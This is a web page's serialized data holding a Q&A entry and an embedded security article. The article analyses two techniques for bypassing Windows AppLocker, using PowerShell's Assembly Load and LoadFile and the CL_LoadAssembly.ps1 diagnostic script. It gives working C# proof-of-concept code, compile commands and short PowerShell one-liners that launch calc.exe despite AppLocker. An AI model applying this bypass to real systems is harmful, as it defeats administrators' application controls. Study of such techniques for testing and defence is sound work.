[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fywPc_e2lFu5FhsCCUspliM0j78OlCbumxQpVO2YKT6Q":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":33,"aiModel":30,"aiConfidence":30,"updatedAt":49,"createdAt":50,"_status":48},205,"What are the key requirements to successfully execute this AppLocker bypass?","The primary requirement is that the .NET assembly must be compiled against .NET Framework 2.0; compiling with .NET 4.0 will cause errors. The attacker also needs the ability to run PowerShell commands or import the diagnostic module. The technique exploits the fact that AppLocker does not restrict assembly loading via these methods, allowing code execution from arbitrary file paths. For a deeper analysis of similar bypasses, see [Testing and Analysis of Bypassing AppLocker Using LUA Scripts](\u002Fnews\u002Ftesting-and-analysis-of-bypassing-applocker-using-lua-scripts).","\u003Cp>The primary requirement is that the .NET assembly must be compiled against .NET Framework 2.0; compiling with .NET 4.0 will cause errors. The attacker also needs the ability to run PowerShell commands or import the diagnostic module. The technique exploits the fact that AppLocker does not restrict assembly loading via these methods, allowing code execution from arbitrary file paths. For a deeper analysis of similar bypasses, see [Testing and Analysis of Bypassing AppLocker Using LUA Scripts](\u002Fnews\u002Ftesting-and-analysis-of-bypassing-applocker-using-lua-scripts).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fanalysis-and-summary-of-bypassing-applocker-using-assembly-load-loadfile\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-are-the-key-requirements-to-successfully-execute-this-applocker-bypass-1777484706264","AppLocker bypass, .NET 2.0, PowerShell, assembly loading, prerequisites",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":27,"cover":30,"author":31,"views":19,"readingTime":32,"status":33,"publishedAt":34,"seo":35,"tags":39,"qaPairs":40,"meta":45,"updatedAt":46,"createdAt":47,"_status":48},53,"Analysis and Summary of Bypassing AppLocker Using Assembly Load & LoadFile","analysis-and-summary-of-bypassing-applocker-using-assembly-load-loadfile","Learn how to bypass AppLocker using PowerShell's Assembly Load and LoadFile methods. Reproduce bohops and Casey Smith techniques, analyze differences, and summarize exploitation.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Recently, bohops introduced a method to bypass AppLocker using CL_LoadAssembly.ps1 in the article \"Executing Commands and Bypassing AppLocker with PowerShell Diagnostic Scripts,\" a technique also mentioned by Casey Smith as early as SchmooCon 2015. This article will reproduce both of their implementation methods, analyze the details, compare the differences, and summarize the exploitation approach.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Reproducing bohops' method\u003C\u002Fli>\u003Cli>Reproducing Casey Smith's method\u003C\u002Fli>\u003Cli>Detailed analysis\u003C\u002Fli>\u003Cli>Summary of exploitation approach\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Reproducing bohops' method\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Test system: Win7 x86\u003C\u002Fp>\u003Cp>AppLocker enabled. For enabling methods, refer to the article \"Bypass Windows AppLocker\"\u003C\u002Fp>\u003Cp>Development tool: VS2012\u003C\u002Fp>\u003Cp>1. Create a new C# console project ConsoleApplication5, default code as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>using System;\u003Cbr>using System.Collections.Generic;\u003Cbr>using System.Text;\u003Cbr>\u003Cbr>namespace ConsoleApplication5\u003Cbr>{\u003Cbr>    class Program\u003Cbr>    {\u003Cbr>        static void Main(string[] args)\u003Cbr>        {\u003Cbr>        }\u003Cbr>    }\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>2. Modify the code as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>namespace ConsoleApplication5\u003Cbr>{\u003Cbr>    public class Program\u003Cbr>    {\u003Cbr>        public static void test()\u003Cbr>        {\u003Cbr>            System.Diagnostics.Process p = new System.Diagnostics.Process();\u003Cbr>            p.StartInfo.FileName = \"c:\\\\windows\\\\system32\\\\calc.exe\";\u003Cbr>\u002F\u002F            p.StartInfo.FileName = \"c:\\\\windows\\\\system32\\\\cmd.exe\";\u003Cbr>\u002F\u002F            p.StartInfo.Arguments = @\"\u002Fc \"\"powershell.exe\"\" -ep bypass -c $host\";   \u003Cbr>            p.Start();\u003Cbr>        }\u003Cbr>        static void Main(string[] args)\u003Cbr>        {\u003Cbr>            test();\u003Cbr>        }\u003Cbr>        \u003Cbr>    }\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Add the access modifier public before class Program, and also add the access modifier public to Method test()\u003C\u002Fp>\u003Cp>3. Change the target framework to .NET 2.0, compile and generate ConsoleApplication5, save it under c:\\6\u003C\u002Fp>\u003Cp>4. Execute the following code in PowerShell:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>cd C:\\windows\\diagnostics\\system\\AERO\u003Cbr>import-module .\\CL_LoadAssembly.ps1\u003Cbr>LoadAssemblyFromPath ..\\..\\..\\..\\6\\ConsoleApplication5.exe\u003Cbr>[ConsoleApplication5.Program]::test()\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>..\\..\\..\\..\\ can locate to c:\\\u003C\u002Fp>\u003Cp>[ConsoleApplication5.Program]::test() must correspond to the code within the program, in the format: [$namespace.$class]::$function()\u003C\u002Fp>\u003Cp>Successfully execute calc.exe, bypassing AppLocker\u003C\u002Fp>\u003Ch2>0x03 Reproducing Casey Smith's method\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Test system: Win7 x86\u003C\u002Fp>\u003Cp>Enable Applocker\u003C\u002Fp>\u003Cp>Code reference address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgist.github.com\u002FnetbiosX\u002F5f19a3e8762b6e3fd25782d8c37b1663\u003C\u002Fp>\u003Cp>This test makes slight modifications to Casey Smith's code\u003C\u002Fp>\u003Cp>1. Create a new file bypass.cs with the following content:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>using System;\u003Cbr>using System.Collections.Generic;\u003Cbr>using System.Text;\u003Cbr>\u003Cbr>public class Program\u003Cbr>{\u003Cbr>\tpublic static void Main()\u003Cbr>\t{\u003Cbr>\t\tConsole.WriteLine(\"Hey There From Main()\");\u003Cbr>\t\t\u002F\u002FAdd any behaviour here to throw off sandbox execution\u002Fanalysts :)\u003Cbr>\t\t\u003Cbr>\t}\u003Cbr>\t\u003Cbr>}\u003Cbr>public class aaa\u003Cbr> {\u003Cbr>        public static void bbb()\u003Cbr>        {\u003Cbr>            System.Diagnostics.Process p = new System.Diagnostics.Process();\u003Cbr>            p.StartInfo.FileName = \"c:\\\\windows\\\\system32\\\\calc.exe\";\u003Cbr>\u002F\u002F            p.StartInfo.FileName = \"c:\\\\windows\\\\system32\\\\cmd.exe\";\u003Cbr>\u002F\u002F            p.StartInfo.Arguments = @\"\u002Fc \"\"powershell.exe\"\" -ep bypass -c notepad.exe\";   \u003Cbr>            p.Start();\u003Cbr>        }\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>2. Compile it using csc.exe version 2.0 to generate an exe file\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\csc.exe \u002Funsafe \u002Fplatform:x86 \u002Fout:bypass.exe bypass.cs\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>3. Execute the following code in PowerShell:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$bytes = [System.IO.File]::ReadAllBytes(\"C:\\6\\bypass.exe\")\u003Cbr>[Reflection.Assembly]::Load($bytes)\u003Cbr>[aaa]::bbb()\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Successfully executed calc.exe, bypassing AppLocker\u003C\u002Fp>\u003Ch2>0x04 Comparative Analysis\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Bohops' method\u003C\u002Fh3>\u003Cp>Load the file CL_LoadAssembly.ps1, located at C:\\windows\\diagnostics\\system\\AERO\u003C\u002Fp>\u003Cp>The content of the file CL_LoadAssembly.ps1 is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp># Copyright © 2008, Microsoft Corporation. All rights reserved.\u003Cbr>\u003Cbr>\u003Cbr># Common library\u003Cbr>. .\\CL_Utility.ps1\u003Cbr>\u003Cbr>function LoadAssemblyFromNS([string]$namespace)\u003Cbr>{\u003Cbr>    if([string]::IsNullorEmpty($namespace))\u003Cbr>    {\u003Cbr>        throw \"Invalid namespace\"\u003Cbr>    }\u003Cbr>\u003Cbr>    [System.Reflection.Assembly]::LoadWithPartialName($namespace) &gt; $null\u003Cbr>}\u003Cbr>\u003Cbr>function LoadAssemblyFromPath([string]$scriptPath)\u003Cbr>{\u003Cbr>    if([String]::IsNullorEmpty($scriptPath))\u003Cbr>    {\u003Cbr>        throw \"Invalid file path\"\u003Cbr>    }\u003Cbr>\u003Cbr>    $absolutePath = GetAbsolutionPath $scriptPath\u003Cbr>\u003Cbr>\u003Cbr>[System.Reflection.Assembly]::LoadFile($absolutePath) &gt; $null\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Call the function LoadAssemblyFromPath, essentially invoking [System.Reflection.Assembly]::LoadFile($absolutePath)\u003C\u002Fp>\u003Ch3>2. Casey Smith's method\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$bytes = [System.IO.File]::ReadAllBytes(\"C:\\6\\bypass.exe\")\u003Cbr>[Reflection.Assembly]::Load($bytes)\u003Cbr>[aaa]::bbb()\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Invoked [Reflection.Assembly]::Load($bytes)\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>[Reflection.Assembly] is shorthand for [System.Reflection.Assembly]\u003C\u002Fp>\u003Ch3>3. Comparison\u003C\u002Fh3>\u003Cp>The two methods use Assembly's LoadFile and Load methods respectively, with minimal practical difference in this context\u003C\u002Fp>\u003Cp>You can use the LoadFile and Load methods respectively to call the two exes generated by the above two methods (compiled by vs2012 and csc.exe respectively)\u003C\u002Fp>\u003Cp>The swapped code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$bytes = [System.IO.File]::ReadAllBytes(\"C:\\6\\ConsoleApplication5.exe\")\u003Cbr>[Reflection.Assembly]::Load($bytes)\u003Cbr>[ConsoleApplication5.Program]::test()\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>cd C:\\windows\\diagnostics\\system\\AERO\u003Cbr>import-module .\\CL_LoadAssembly.ps1\u003Cbr>LoadAssemblyFromPath ..\\..\\..\\..\\6\\bypass.exe\u003Cbr>[aaa]::bbb()\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Based on the above tests, it can be inferred that the following two code segments are equivalent:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>cd C:\\windows\\diagnostics\\system\\AERO\u003Cbr>import-module .\\CL_LoadAssembly.ps1\u003Cbr>LoadAssemblyFromPath ..\\..\\..\\..\\6\\bypass.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>[Reflection.Assembly]::LoadFile(\"C:\\6\\bypass.exe\")\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>According to the above inference, we can simplify Casey Smith's exploit code, with the shortest PowerShell implementation as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>[Reflection.Assembly]::LoadFile(\"C:\\6\\bypass.exe\")\u003Cbr>[aaa]::bbb()\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>4. Applicable Conditions\u003C\u002Fh3>\u003Cp>In actual testing, the above two methods are applicable to .NET 2.0; if compiled with .NET 4.0, an error will occur during execution.\u003C\u002Fp>\u003Ch2>0x05 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article tested the methods of bohops and Casey Smith respectively, finding that the essence of the methods lies in using the LoadFile and Load methods of Assembly. Through actual testing, it is concluded that this method is only applicable to the .NET 2.0 environment.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr",null,"Onedaysec",3,"published","2026-02-02T08:11:57.638Z",{"title":36,"description":14,"keywords":37,"ogImage":30,"canonicalUrl":30,"noIndex":38},"Bypass AppLocker with PowerShell Assembly Load & LoadFile","AppLocker bypass, PowerShell, Assembly Load, LoadFile, CL_LoadAssembly, Casey Smith, bohops, exploit, security",false,[],{"docs":41,"hasNextPage":38},[42,4,43,44],206,204,203,{"title":30,"description":30,"image":30},"2026-07-24T02:07:28.064Z","2026-07-23T16:01:10.707Z","draft","2026-07-23T16:04:31.983Z","2026-07-23T16:04:31.982Z"]